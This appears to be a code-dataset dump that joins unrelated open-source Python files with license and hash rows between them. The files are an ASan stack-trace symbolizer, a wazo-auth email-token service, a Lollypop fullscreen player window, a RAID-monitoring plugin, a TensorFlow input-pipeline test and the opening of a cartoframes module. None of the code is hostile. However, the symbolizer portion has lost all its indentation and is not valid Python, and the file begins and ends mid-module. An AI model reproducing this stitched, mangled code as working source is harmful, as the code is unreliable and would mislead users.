cmd.append('--dsym-hint=%s' % hint)
if DEBUG:
print ' '.join(cmd)
try:
result = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
except OSError:
result = None
return result
def symbolize(self, addr, binary, offset):
"""Overrides Symbolizer.symbolize."""
if not self.pipe:
return None
result = []
try:
symbolizer_input = '"%s" %s' % (binary, offset)
if DEBUG:
print symbolizer_input
print >> self.pipe.stdin, symbolizer_input
while True:
function_name = self.pipe.stdout.readline().rstrip()
if not function_name:
break
file_name = self.pipe.stdout.readline().rstrip()
file_name = fix_filename(file_name)
if (not function_name.startswith('??') or
not file_name.startswith('??')):
# Append only non-trivial frames.
result.append('%s in %s %s' % (addr, function_name,
file_name))
except Exception:
result = []
if not result:
result = None
return result
def LLVMSymbolizerFactory(system, default_arch, dsym_hints=[]):
symbolizer_path = os.getenv('LLVM_SYMBOLIZER_PATH')
if not symbolizer_path:
symbolizer_path = os.getenv('ASAN_SYMBOLIZER_PATH')
if not symbolizer_path:
# Assume llvm-symbolizer is in PATH.
symbolizer_path = 'llvm-symbolizer'
return LLVMSymbolizer(symbolizer_path, default_arch, system, dsym_hints)
class Addr2LineSymbolizer(Symbolizer):
def __init__(self, binary):
super(Addr2LineSymbolizer, self).__init__()
self.binary = binary
self.pipe = self.open_addr2line()
self.output_terminator = -1
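    # A dummy address written after each real offset; the bogus lookup it
    # triggers marks the end of the inlined-frame output for that offset.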
def open_addr2line(self):
addr2line_tool = 'addr2line'
if binutils_prefix:
addr2line_tool = binutils_prefix + addr2line_tool
cmd = [addr2line_tool, '-fi']
if demangle:
cmd += ['--demangle']
cmd += ['-e', self.binary]
if DEBUG:
print ' '.join(cmd)
return subprocess.Popen(cmd,
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
def symbolize(self, addr, binary, offset):
"""Overrides Symbolizer.symbolize."""
if self.binary != binary:
return None
lines = []
try:
print >> self.pipe.stdin, offset
print >> self.pipe.stdin, self.output_terminator
is_first_frame = True
while True:
function_name = self.pipe.stdout.readline().rstrip()
file_name = self.pipe.stdout.readline().rstrip()
if is_first_frame:
is_first_frame = False
elif function_name in ['', '??']:
assert file_name == function_name
break
lines.append((function_name, file_name));
except Exception:
lines.append(('??', '??:0'))
return ['%s in %s %s' % (addr, function, fix_filename(file)) for (function, file) in lines]
class UnbufferedLineConverter(object):
"""
Wrap a child process that responds to each line of input with one line of
output. Uses pty to trick the child into providing unbuffered output.
"""
def __init__(self, args, close_stderr=False):
# Local imports so that the script can start on Windows.
import pty
import termios
pid, fd = pty.fork()
if pid == 0:
# We're the child. Transfer control to command.
if close_stderr:
dev_null = os.open('/dev/null', 0)
os.dup2(dev_null, 2)
os.execvp(args[0], args)
else:
# Disable echoing.
attr = termios.tcgetattr(fd)
attr[3] = attr[3] & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, attr)
# Set up a file()-like interface to the child process
self.r = os.fdopen(fd, "r", 1)
self.w = os.fdopen(os.dup(fd), "w", 1)
def convert(self, line):
self.w.write(line + "\n")
return self.readline()
def readline(self):
return self.r.readline().rstrip()
class DarwinSymbolizer(Symbolizer):
def __init__(self, addr, binary, arch):
super(DarwinSymbolizer, self).__init__()
self.binary = binary
self.arch = arch
self.open_atos()
def open_atos(self):
if DEBUG:
print 'atos -o %s -arch %s' % (self.binary, self.arch)
cmdline = ['atos', '-o', self.binary, '-arch', self.arch]
self.atos = UnbufferedLineConverter(cmdline, close_stderr=True)
def symbolize(self, addr, binary, offset):
"""Overrides Symbolizer.symbolize."""
if self.binary != binary:
return None
atos_line = self.atos.convert('0x%x' % int(offset, 16))
while "got symbolicator for" in atos_line:
atos_line = self.atos.readline()
# A well-formed atos response looks like this:
# foo(type1, type2) (in object.name) (filename.cc:80)
match = re.match('^(.*) \(in (.*)\) \((.*:\d*)\)$', atos_line)
if DEBUG:
print 'atos_line: ', atos_line
if match:
function_name = match.group(1)
function_name = re.sub('\(.*?\)', '', function_name)
file_name = fix_filename(match.group(3))
return ['%s in %s %s' % (addr, function_name, file_name)]
else:
return ['%s in %s' % (addr, atos_line)]
# Chain several symbolizers so that if one symbolizer fails, we fall back
# to the next symbolizer in chain.
class ChainSymbolizer(Symbolizer):
def __init__(self, symbolizer_list):
super(ChainSymbolizer, self).__init__()
self.symbolizer_list = symbolizer_list
def symbolize(self, addr, binary, offset):
"""Overrides Symbolizer.symbolize."""
for symbolizer in self.symbolizer_list:
if symbolizer:
result = symbolizer.symbolize(addr, binary, offset)
if result:
return result
return None
def append_symbolizer(self, symbolizer):
self.symbolizer_list.append(symbolizer)
def BreakpadSymbolizerFactory(binary):
suffix = os.getenv('BREAKPAD_SUFFIX')
if suffix:
filename = binary + suffix
if os.access(filename, os.F_OK):
return BreakpadSymbolizer(filename)
return None
def SystemSymbolizerFactory(system, addr, binary, arch):
if system == 'Darwin':
return DarwinSymbolizer(addr, binary, arch)
elif system == 'Linux' or system == 'FreeBSD':
return Addr2LineSymbolizer(binary)
class BreakpadSymbolizer(Symbolizer):
def __init__(self, filename):
super(BreakpadSymbolizer, self).__init__()
self.filename = filename
lines = file(filename).readlines()
self.files = []
self.symbols = {}
self.address_list = []
self.addresses = {}
# MODULE mac x86_64 A7001116478B33F18FF9BEDE9F615F190 t
fragments = lines[0].rstrip().split()
self.arch = fragments[2]
self.debug_id = fragments[3]
self.binary = ' '.join(fragments[4:])
self.parse_lines(lines[1:])
def parse_lines(self, lines):
cur_function_addr = ''
for line in lines:
fragments = line.split()
if fragments[0] == 'FILE':
assert int(fragments[1]) == len(self.files)
self.files.append(' '.join(fragments[2:]))
elif fragments[0] == 'PUBLIC':
self.symbols[int(fragments[1], 16)] = ' '.join(fragments[3:])
elif fragments[0] in ['CFI', 'STACK']:
pass
elif fragments[0] == 'FUNC':
cur_function_addr = int(fragments[1], 16)
if not cur_function_addr in self.symbols.keys():
self.symbols[cur_function_addr] = ' '.join(fragments[4:])
else:
# Line starting with an address.
addr = int(fragments[0], 16)
self.address_list.append(addr)
# Tuple of symbol address, size, line, file number.
self.addresses[addr] = (cur_function_addr,
int(fragments[1], 16),
int(fragments[2]),
int(fragments[3]))
self.address_list.sort()
def get_sym_file_line(self, addr):
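    # Find the symbol record covering addr: exact match first, otherwise the
    # closest preceding address via binary search; returns
    # (symbol, filename, line) or None if addr falls outside any known range.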
key = None
if addr in self.addresses.keys():
key = addr
else:
index = bisect.bisect_left(self.address_list, addr)
if index == 0:
return None
else:
key = self.address_list[index - 1]
sym_id, size, line_no, file_no = self.addresses[key]
symbol = self.symbols[sym_id]
filename = self.files[file_no]
if addr < key + size:
return symbol, filename, line_no
else:
return None
def symbolize(self, addr, binary, offset):
if self.binary != binary:
return None
res = self.get_sym_file_line(int(offset, 16))
if res:
function_name, file_name, line_no = res
result = ['%s in %s %s:%d' % (
addr, function_name, file_name, line_no)]
print result
return result
else:
return None
class SymbolizationLoop(object):
def __init__(self, binary_name_filter=None, dsym_hint_producer=None):
if sys.platform == 'win32':
# ASan on Windows uses dbghelp.dll to symbolize in-process, which works
# even in sandboxed processes. Nothing needs to be done here.
self.process_line = self.process_line_echo
else:
# Used by clients who may want to supply a different binary name.
# E.g. in Chrome several binaries may share a single .dSYM.
self.binary_name_filter = binary_name_filter
self.dsym_hint_producer = dsym_hint_producer
self.system = os.uname()[0]
if self.system not in ['Linux', 'Darwin', 'FreeBSD']:
raise Exception('Unknown system')
self.llvm_symbolizers = {}
self.last_llvm_symbolizer = None
self.dsym_hints = set([])
self.frame_no = 0
self.process_line = self.process_line_posix
def symbolize_address(self, addr, binary, offset, arch):
# On non-Darwin (i.e. on platforms without .dSYM debug info) always use
# a single symbolizer binary.
# On Darwin, if the dsym hint producer is present:
# 1. check whether we've seen this binary already; if so,
# use |llvm_symbolizers[binary]|, which has already loaded the debug
# info for this binary (might not be the case for
# |last_llvm_symbolizer|);
# 2. otherwise check if we've seen all the hints for this binary already;
# if so, reuse |last_llvm_symbolizer| which has the full set of hints;
# 3. otherwise create a new symbolizer and pass all currently known
# .dSYM hints to it.
result = None
if not force_system_symbolizer:
if not binary in self.llvm_symbolizers:
use_new_symbolizer = True
if self.system == 'Darwin' and self.dsym_hint_producer:
dsym_hints_for_binary = set(self.dsym_hint_producer(binary))
use_new_symbolizer = bool(dsym_hints_for_binary - self.dsym_hints)
self.dsym_hints |= dsym_hints_for_binary
if self.last_llvm_symbolizer and not use_new_symbolizer:
self.llvm_symbolizers[binary] = self.last_llvm_symbolizer
else:
self.last_llvm_symbolizer = LLVMSymbolizerFactory(
self.system, arch, self.dsym_hints)
self.llvm_symbolizers[binary] = self.last_llvm_symbolizer
# Use the chain of symbolizers:
# Breakpad symbolizer -> LLVM symbolizer -> addr2line/atos
# (fall back to next symbolizer if the previous one fails).
if not binary in symbolizers:
symbolizers[binary] = ChainSymbolizer(
[BreakpadSymbolizerFactory(binary), self.llvm_symbolizers[binary]])
result = symbolizers[binary].symbolize(addr, binary, offset)
else:
symbolizers[binary] = ChainSymbolizer([])
if result is None:
if not allow_system_symbolizer:
raise Exception('Failed to launch or use llvm-symbolizer.')
# Initialize system symbolizer only if other symbolizers failed.
symbolizers[binary].append_symbolizer(
SystemSymbolizerFactory(self.system, addr, binary, arch))
result = symbolizers[binary].symbolize(addr, binary, offset)
# The system symbolizer must produce some result.
assert result
return result
def get_symbolized_lines(self, symbolized_lines):
if not symbolized_lines:
return [self.current_line]
else:
result = []
for symbolized_frame in symbolized_lines:
result.append(' #%s %s' % (str(self.frame_no), symbolized_frame.rstrip()))
self.frame_no += 1
return result
def process_logfile(self):
self.frame_no = 0
for line in logfile:
processed = self.process_line(line)
print '\n'.join(processed)
def process_line_echo(self, line):
return [line.rstrip()]
def process_line_posix(self, line):
self.current_line = line.rstrip()
#0 0x7f6e35cf2e45 (/blah/foo.so+0x11fe45)
stack_trace_line_format = (
'^( *#([0-9]+) *)(0x[0-9a-f]+) *\((.*)\+(0x[0-9a-f]+)\)')
match = re.match(stack_trace_line_format, line)
if not match:
return [self.current_line]
if DEBUG:
print line
_, frameno_str, addr, binary, offset = match.groups()
arch = ""
# Arch can be embedded in the filename, e.g.: "libabc.dylib:x86_64h"
colon_pos = binary.rfind(":")
if colon_pos != -1:
maybe_arch = binary[colon_pos+1:]
if is_valid_arch(maybe_arch):
arch = maybe_arch
binary = binary[0:colon_pos]
if arch == "":
arch = guess_arch(addr)
if frameno_str == '0':
# Assume that frame #0 is the first frame of new stack trace.
self.frame_no = 0
original_binary = binary
if self.binary_name_filter:
binary = self.binary_name_filter(binary)
symbolized_line = self.symbolize_address(addr, binary, offset, arch)
if not symbolized_line:
if original_binary != binary:
symbolized_line = self.symbolize_address(addr, binary, offset, arch)
return self.get_symbolized_lines(symbolized_line)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='ASan symbolization script',
epilog='Example of use:\n'
'asan_symbolize.py -c "$HOME/opt/cross/bin/arm-linux-gnueabi-" '
'-s "$HOME/SymbolFiles" < asan.log')
parser.add_argument('path_to_cut', nargs='*',
help='pattern to be cut from the result file path ')
parser.add_argument('-d','--demangle', action='store_true',
help='demangle function names')
parser.add_argument('-s', metavar='SYSROOT',
help='set path to sysroot for sanitized binaries')
parser.add_argument('-c', metavar='CROSS_COMPILE',
help='set prefix for binutils')
parser.add_argument('-l','--logfile', default=sys.stdin,
type=argparse.FileType('r'),
help='set log file name to parse, default is stdin')
parser.add_argument('--force-system-symbolizer', action='store_true',
help='don\'t use llvm-symbolizer')
args = parser.parse_args()
if args.path_to_cut:
fix_filename_patterns = args.path_to_cut
if args.demangle:
demangle = True
if args.s:
binary_name_filter = sysroot_path_filter
sysroot_path = args.s
if args.c:
binutils_prefix = args.c
if args.logfile:
logfile = args.logfile
else:
logfile = sys.stdin
if args.force_system_symbolizer:
force_system_symbolizer = True
if force_system_symbolizer:
assert(allow_system_symbolizer)
loop = SymbolizationLoop(binary_name_filter)
loop.process_logfile()
| mit | 6,929,749,312,844,605,000 | 34.139806 | 95 | 0.62375 | false |
wazo-pbx/xivo-auth | wazo_auth/services/email.py | 1 | 4200 | # Copyright 2018-2020 The Wazo Authors (see the AUTHORS file)
# SPDX-License-Identifier: GPL-3.0-or-later
import time
import smtplib
from collections import namedtuple
from email import utils as email_utils
from email.mime.text import MIMEText
from wazo_auth.services.helpers import BaseService
EmailDestination = namedtuple('EmailDestination', ['name', 'address'])
# NOTE(sileht): the default socket timeout is None on Linux.
# Our HTTP client timeout is 10s; since sending mail is currently synchronous,
# we have to be sure we return before those 10s, so we set an SMTP timeout.
SMTP_TIMEOUT = 4
class EmailService(BaseService):
def __init__(self, dao, tenant_uuid, config, template_formatter):
super().__init__(dao, tenant_uuid)
self._formatter = template_formatter
self._smtp_host = config['smtp']['hostname']
self._smtp_port = config['smtp']['port']
self._confirmation_token_expiration = config['email_confirmation_expiration']
self._reset_token_expiration = config['password_reset_expiration']
self._confirmation_from = EmailDestination(
config['email_confirmation_from_name'],
config['email_confirmation_from_address'],
)
self._password_reset_from = EmailDestination(
config['password_reset_from_name'], config['password_reset_from_address']
)
def confirm(self, email_uuid):
self._dao.email.confirm(email_uuid)
def send_confirmation_email(
self, username, email_uuid, email_address, connection_params
):
template_context = dict(connection_params)
template_context.update(
{
'token': self._new_email_confirmation_token(email_uuid),
'username': username,
'email_uuid': email_uuid,
'email_address': email_address,
}
)
body = self._formatter.format_confirmation_email(template_context)
subject = self._formatter.format_confirmation_subject(template_context)
to = EmailDestination(username, email_address)
self._send_msg(to, self._confirmation_from, subject, body)
def send_reset_email(self, user_uuid, username, email_address, connection_params):
template_context = dict(connection_params)
template_context.update(
{
'token': self._new_email_reset_token(user_uuid),
'username': username,
'user_uuid': user_uuid,
'email_address': email_address,
}
)
body = self._formatter.format_password_reset_email(template_context)
subject = self._formatter.format_password_reset_subject(template_context)
to = EmailDestination(username, email_address)
self._send_msg(to, self._confirmation_from, subject, body)
def _send_msg(self, to, from_, subject, body):
msg = MIMEText(body)
msg['To'] = email_utils.formataddr(to)
msg['From'] = email_utils.formataddr(from_)
msg['Subject'] = subject
with smtplib.SMTP(
self._smtp_host, self._smtp_port, timeout=SMTP_TIMEOUT
) as server:
server.sendmail(from_.address, [to.address], msg.as_string())
def _new_email_confirmation_token(self, email_uuid):
acl = 'auth.emails.{}.confirm.edit'.format(email_uuid)
return self._new_generic_token(self._confirmation_token_expiration, acl)
def _new_email_reset_token(self, user_uuid):
acl = 'auth.users.password.reset.{}.create'.format(user_uuid)
return self._new_generic_token(self._reset_token_expiration, acl)
def _new_generic_token(self, expiration, *acl):
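        # Build a short-lived internal wazo-auth token restricted to the given ACLs.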
t = time.time()
token_payload = {
'auth_id': 'wazo-auth',
'pbx_user_uuid': None,
'xivo_uuid': None,
'expire_t': t + expiration,
'issued_t': t,
'acl': acl,
'user_agent': 'wazo-auth-email-reset',
'remote_addr': '',
}
session_payload = {}
token_uuid, session_uuid = self._dao.token.create(
token_payload, session_payload
)
return token_uuid
| gpl-3.0 | 9,150,577,829,045,108,000 | 37.53211 | 86 | 0.621429 | false |
yoseforb/lollypop | src/fullscreen.py | 1 | 9247 | #!/usr/bin/python
# Copyright (c) 2014-2015 Cedric Bellegarde <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import Gtk, Gdk, GLib
from cgi import escape
from gettext import gettext as _
from lollypop.define import Lp, ArtSize, Type
from lollypop.utils import seconds_to_string
# Show a fullscreen window showing current track context
class FullScreen(Gtk.Window):
"""
Init window and set transient for parent
@param: parent as Gtk.window
"""
def __init__(self, parent):
Gtk.Window.__init__(self)
self._timeout = None
self._seeking = False
self._signal1_id = None
self._signal2_id = None
self.set_transient_for(parent)
self.set_skip_taskbar_hint(True)
self.set_skip_pager_hint(True)
builder = Gtk.Builder()
builder.add_from_resource('/org/gnome/Lollypop/FullScreen.ui')
main_widget = builder.get_object('fs')
self.add(main_widget)
self._prev_btn = builder.get_object('prev_btn')
self._prev_btn.connect('clicked', self._on_prev_btn_clicked)
self._play_btn = builder.get_object('play_btn')
self._play_btn.connect('clicked', self._on_play_btn_clicked)
self._next_btn = builder.get_object('next_btn')
self._next_btn.connect('clicked', self._on_next_btn_clicked)
self._play_image = builder.get_object('play_image')
self._pause_image = builder.get_object('pause_image')
close_btn = builder.get_object('close_btn')
close_btn.connect('clicked', self._destroy)
self._cover = builder.get_object('cover')
self._title = builder.get_object('title')
self._artist = builder.get_object('artist')
self._album = builder.get_object('album')
self._next = builder.get_object('next')
self._next_cover = builder.get_object('next_cover')
self._progress = builder.get_object('progress_scale')
self._progress.connect('button-release-event',
self._on_progress_release_button)
self._progress.connect('button-press-event',
self._on_progress_press_button)
self._timelabel = builder.get_object('playback')
self._total_time_label = builder.get_object('duration')
self.connect('key-release-event', self._on_key_release_event)
"""
Init signals, set color and go party mode if nothing is playing
"""
def do_show(self):
is_playing = Lp.player.is_playing()
self._signal1_id = Lp.player.connect('current-changed',
self._on_current_changed)
self._signal2_id = Lp.player.connect('status-changed',
self._on_status_changed)
if is_playing:
self._change_play_btn_status(self._pause_image, _('Pause'))
self._on_current_changed(Lp.player)
else:
Lp.player.set_party(True)
if not self._timeout:
self._timeout = GLib.timeout_add(1000, self._update_position)
Gtk.Window.do_show(self)
self._update_position()
self.fullscreen()
"""
Remove signals and unset color
"""
def do_hide(self):
if self._signal1_id:
Lp.player.disconnect(self._signal1_id)
self._signal1_id = None
if self._signal2_id:
Lp.player.disconnect(self._signal2_id)
self._signal2_id = None
if self._timeout:
GLib.source_remove(self._timeout)
self._timeout = None
#######################
# PRIVATE #
#######################
"""
Update View for current track
- Cover
- artist/title
- reset progress bar
- update time/total labels
@param player as Player
"""
def _on_current_changed(self, player):
if player.current_track.id is None:
pass # Impossible as we force play on show
else:
if Lp.player.current_track.id == Type.RADIOS:
self._prev_btn.set_sensitive(False)
self._next_btn.set_sensitive(False)
self._timelabel.hide()
self._total_time_label.hide()
self._progress.hide()
cover = Lp.art.get_radio(player.current_track.artist,
ArtSize.MONSTER)
else:
self._prev_btn.set_sensitive(True)
self._next_btn.set_sensitive(True)
self._timelabel.show()
self._total_time_label.show()
self._progress.show()
cover = Lp.art.get_album(player.current_track.album_id,
ArtSize.MONSTER)
self._cover.set_from_pixbuf(cover)
del cover
album = player.current_track.album
if player.current_track.year != '':
album += " (%s)" % player.current_track.year
self._title.set_text(player.current_track.title)
self._artist.set_text(player.current_track.artist)
self._album.set_text(album)
next_cover = Lp.art.get_album(player.next_track.album_id,
ArtSize.MEDIUM)
self._next_cover.set_from_pixbuf(next_cover)
del next_cover
self._next.set_markup("<b>%s</b> - %s" %
(escape(player.next_track.artist),
escape(player.next_track.title)))
self._progress.set_value(1.0)
self._progress.set_range(0.0, player.current_track.duration * 60)
self._total_time_label.set_text(
seconds_to_string(player.current_track.duration))
self._timelabel.set_text("0:00")
"""
Destroy window if Esc
@param widget as Gtk.Widget
@param event as Gdk.event
"""
def _on_key_release_event(self, widget, event):
if event.keyval == Gdk.KEY_Escape:
self.destroy()
"""
Go to prev track
@param widget as Gtk.Button
"""
def _on_prev_btn_clicked(self, widget):
Lp.player.prev()
"""
Play/pause
@param widget as Gtk.Button
"""
def _on_play_btn_clicked(self, widget):
if Lp.player.is_playing():
Lp.player.pause()
widget.set_image(self._play_image)
else:
Lp.player.play()
widget.set_image(self._pause_image)
"""
Go to next track
@param widget as Gtk.Button
"""
def _on_next_btn_clicked(self, widget):
Lp.player.next()
"""
Update buttons and progress bar
@param obj as unused
"""
def _on_status_changed(self, obj):
is_playing = Lp.player.is_playing()
if is_playing and not self._timeout:
self._timeout = GLib.timeout_add(1000, self._update_position)
self._change_play_btn_status(self._pause_image, _("Pause"))
elif not is_playing and self._timeout:
GLib.source_remove(self._timeout)
self._timeout = None
self._change_play_btn_status(self._play_image, _("Play"))
"""
On press, mark player as seeking
@param unused
"""
def _on_progress_press_button(self, scale, data):
self._seeking = True
"""
Callback for scale release button
Seek player to scale value
@param scale as Gtk.Scale, data as unused
"""
def _on_progress_release_button(self, scale, data):
value = scale.get_value()
self._seeking = False
self._update_position(value)
Lp.player.seek(value/60)
"""
Update play button with image and status as tooltip
@param image as Gtk.Image
@param status as str
"""
def _change_play_btn_status(self, image, status):
self._play_btn.set_image(image)
self._play_btn.set_tooltip_text(status)
"""
Update progress bar position
@param value as int
"""
def _update_position(self, value=None):
if not self._seeking and self._progress.is_visible():
if value is None:
value = Lp.player.get_position_in_track()/1000000
self._progress.set_value(value)
self._timelabel.set_text(seconds_to_string(value/60))
return True
"""
Destroy self
@param widget as Gtk.Button
"""
def _destroy(self, widget):
self.destroy()
| gpl-3.0 | 6,808,737,461,966,250,000 | 35.988 | 77 | 0.571753 | false |
vfuse/nixstatsagent | nixstatsagent/plugins/mdstat.py | 2 | 1272 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import plugins
import json
class Plugin(plugins.BasePlugin):
__name__ = 'mdstat'
def run(self, config):
'''
Monitor software raid status using mdadm
pip install mdstat
'''
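        # 'mdjson' (expected to come with the 'mdstat' pip package mentioned
        # above) prints the software RAID state as JSON.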
data = os.popen('sudo mdjson').read()
results = {}
try:
data = json.loads(data)
except Exception:
return "Could not load mdstat data"
for key, value in data['devices'].items():
device = {}
if(value['active'] is not True):
device['active'] = 0
else:
device['active'] = 1
if(value['read_only'] is not False):
device['read_only'] = 1
else:
device['read_only'] = 0
if(value['resync'] is not None):
device['resync'] = 1
else:
device['resync'] = 0
device['faulty'] = 0
for disk, diskvalue in value['disks'].items():
if diskvalue['faulty'] is not False:
device['faulty'] = device['faulty'] + 1
results[key] = device
return results
if __name__ == '__main__':
Plugin().execute()
| bsd-3-clause | 1,352,827,415,557,494,500 | 26.652174 | 59 | 0.474843 | false |
mcheatham/computationalEnvironmentODP | bin/kernels.py | 1 | 3923 | #!/usr/bin/env python3
from bs4 import BeautifulSoup
from requests import get
from bs4.element import Tag
ignore = {'Lisp Machines, Inc.', 'Symbolics', 'Texas Instruments', 'Xerox'}
levels = {}
levels['Apple Inc.'] = {3}
levels['On S/360, S/370, and successor mainframes'] = {3}
levels['On other hardware platforms'] = {3}
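# Walking backwards through the siblings that precede startTag, returns True if
# the heading text tag1 is found before tag2 (i.e. tag1 is the nearer heading);
# an empty tag1 yields False and an empty tag2 yields True.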
def before(tag1, tag2, startTag):
if len(tag1) == 0: return False;
if len(tag2) == 0 :return True;
tempTag = startTag
while tempTag and tempTag.previous_sibling:
tempTag = tempTag.previous_sibling
if isinstance(tempTag, Tag):
if tag1 in tempTag.getText():
return True
elif tag2 in tempTag.getText():
return False
return True
def includeLI(tag):
for p in tag.parents:
# ignores tags in the page's table of contents, navigation header, and footer
if 'id' in p.attrs.keys() and ('toc' in p['id'] or 'mw-navigation' in p['id'] or 'footer' in p['id']):
return False;
# ignores links to external references and wikipedia categories
if 'class' in p.attrs.keys() and ('references' in p['class'] or 'reference' in p['class'] or 'catlinks' in p['class']):
return False;
# ignores navigation links
if 'role' in p.attrs.keys() and 'navigation' in p['role']:
return False;
# ignores the 'See also' links
if tag.parent and tag.parent.find_previous_sibling('h2') and 'See also' in tag.parent.find_previous_sibling('h2').text:
return False;
# ignores the external links
if tag.parent and tag.parent.find_previous_sibling('h2') and 'External links' in tag.parent.find_previous_sibling('h2').text:
return False;
return True;
def includeA(tag):
# ignores tags specified directly in the ignore list
if tag.text in ignore:
return False;
# ignores links to external references and wikipedia categories
p = tag.parent
if p and 'class' in p.attrs.keys() and 'reference' in p['class']:
return False;
    # This page lists operating systems at various levels of specificity, from kernel down to
    # particular distributions in some cases. The script lets the user specify the correct
    # level(s) of each list to pull via the 'levels' dictionary defined above. The code below
    # ensures that the tag is at an acceptable level; if no level is specified, top-level
    # items are pulled.
h4Depth = -1 # -1 because it takes one move to get out of the <a> tag itself
h4Heading = ''
temp = tag
while temp and not temp.find_previous_sibling('h4'):
h4Depth += 1
temp = temp.parent
if temp and temp.find_previous_sibling('h4') and temp.find_previous_sibling('h4').select('span'):
h4Heading = temp.find_previous_sibling('h4').select('span')[0].getText()
h3Depth = -1
h3Heading = ''
temp = tag
while temp and not temp.find_previous_sibling('h3'):
h3Depth += 1
temp = temp.parent
if temp and temp.find_previous_sibling('h3') and temp.find_previous_sibling('h3').select('span'):
h3Heading = temp.find_previous_sibling('h3').select('span')[0].getText()
if h4Depth < h3Depth or before(h4Heading, h3Heading, temp) and h4Heading in levels:
return h4Depth in levels[h4Heading]
elif h3Heading in levels:
return h3Depth in levels[h3Heading];
else:
return h3Depth == 1
baseUrl = 'https://en.wikipedia.org/wiki/List_of_operating_systems'
doc = get(baseUrl).text
soup = BeautifulSoup(doc, 'html.parser')
listItems = soup.select('li')
answers = set()
for i in listItems:
if not includeLI(i): continue
links = i.select('a')
if links and includeA(links[0]) and not links[0].getText() in answers:
answers.add(links[0].getText())
for answer in sorted(answers):
print(answer)
| mit | -7,770,033,104,525,160,000 | 29.889764 | 129 | 0.647973 | false |
dariox2/CADL | test/testyida6b.py | 1 | 4901 |
#
# test shuffle_batch - 6b
#
# generates a pair of files (color+bn)
# pending: make the tuple match
#
print("Loading tensorflow...")
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import os
from libs import utils
import datetime
tf.set_random_seed(1)
def create_input_pipeline_yida(files1, files2, batch_size, n_epochs, shape, crop_shape=None,
crop_factor=1.0, n_threads=1, seed=None):
producer1 = tf.train.string_input_producer(
files1, capacity=len(files1), shuffle=False)
producer2 = tf.train.string_input_producer(
files2, capacity=len(files2), shuffle=False)
# We need something which can open the files and read its contents.
reader = tf.WholeFileReader()
# We pass the filenames to this object which can read the file's contents.
# This will create another queue running which dequeues the previous queue.
keys1, vals1 = reader.read(producer1)
keys2, vals2 = reader.read(producer2)
# And then have to decode its contents as we know it is a jpeg image
imgs1 = tf.image.decode_jpeg(vals1, channels=3)
imgs2 = tf.image.decode_jpeg(vals2, channels=3)
# We have to explicitly define the shape of the tensor.
# This is because the decode_jpeg operation is still a node in the graph
# and doesn't yet know the shape of the image. Future operations however
# need explicit knowledge of the image's shape in order to be created.
imgs1.set_shape(shape)
imgs2.set_shape(shape)
# Next we'll centrally crop the image to the size of 100x100.
# This operation required explicit knowledge of the image's shape.
if shape[0] > shape[1]:
rsz_shape = [int(shape[0] / shape[1] * crop_shape[0] / crop_factor),
int(crop_shape[1] / crop_factor)]
else:
rsz_shape = [int(crop_shape[0] / crop_factor),
int(shape[1] / shape[0] * crop_shape[1] / crop_factor)]
rszs1 = tf.image.resize_images(imgs1, rsz_shape[0], rsz_shape[1])
rszs2 = tf.image.resize_images(imgs2, rsz_shape[0], rsz_shape[1])
crops1 = (tf.image.resize_image_with_crop_or_pad(
rszs1, crop_shape[0], crop_shape[1])
if crop_shape is not None
else imgs1)
crops2 = (tf.image.resize_image_with_crop_or_pad(
rszs2, crop_shape[0], crop_shape[1])
if crop_shape is not None
else imgs2)
# Now we'll create a batch generator that will also shuffle our examples.
# We tell it how many it should have in its buffer when it randomly
# permutes the order.
min_after_dequeue = len(files1) // 5
# The capacity should be larger than min_after_dequeue, and determines how
# many examples are prefetched. TF docs recommend setting this value to:
# min_after_dequeue + (num_threads + a small safety margin) * batch_size
capacity = min_after_dequeue + (n_threads + 1) * batch_size
# Randomize the order and output batches of batch_size.
batch = tf.train.shuffle_batch([crops1, crops2],
enqueue_many=False,
batch_size=batch_size,
capacity=capacity,
min_after_dequeue=min_after_dequeue,
num_threads=n_threads,
#seed=seed,
)#shapes=(64,64,3))
# alternatively, we could use shuffle_batch_join to use multiple reader
# instances, or set shuffle_batch's n_threads to higher than 1.
return batch
def CELEByida(path):
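    # Return the .jpg paths under `path` in sorted (deterministic) order so
    # both input pipelines read files in the same sequence.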
fs = [os.path.join(path, f)
for f in os.listdir(path) if f.endswith('.jpg')]
fs=sorted(fs)
return fs
print("Loading celebrities...")
from libs.datasets import CELEB
files1 = CELEByida("../session-1/img_align_celeba/") # only 100
files2 = CELEByida("../session-1/img_align_celeba_n/") # only 100
from libs.dataset_utils import create_input_pipeline
batch_size = 8
n_epochs = 3
input_shape = [218, 178, 3]
crop_shape = [64, 64, 3]
crop_factor = 0.8
seed=15
batch1 = create_input_pipeline_yida(
files1=files1, files2=files2,
batch_size=batch_size,
n_epochs=n_epochs,
crop_shape=crop_shape,
crop_factor=crop_factor,
shape=input_shape,
seed=seed)
mntg=[]
sess = tf.Session()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
batres = sess.run(batch1)
batch_xs1=np.array(batres[0])
batch_xs2=np.array(batres[1])
for i in range(0,len(batch_xs1)):
img=batch_xs1[i] / 255.0
mntg.append(img)
img=batch_xs2[i] / 255.0
mntg.append(img)
TID=datetime.date.today().strftime("%Y%m%d")+"_"+datetime.datetime.now().time().strftime("%H%M%S")
m=utils.montage(mntg, saveto="montage_"+TID+".png")
# mntg[0]=color
# mntg[1]=b/n
plt.figure(figsize=(5, 5))
plt.imshow(m)
plt.show()
# eop
| apache-2.0 | 4,011,695,546,058,428,000 | 29.823899 | 98 | 0.64293 | false |
CartoDB/cartoframes | cartoframes/viz/layout.py | 1 | 9384 | from . import constants
from .map import Map
from .html import HTMLLayout
from ..utils.utils import get_center, get_credentials
from ..utils.metrics import send_metrics
from .kuviz import KuvizPublisher
class Layout:
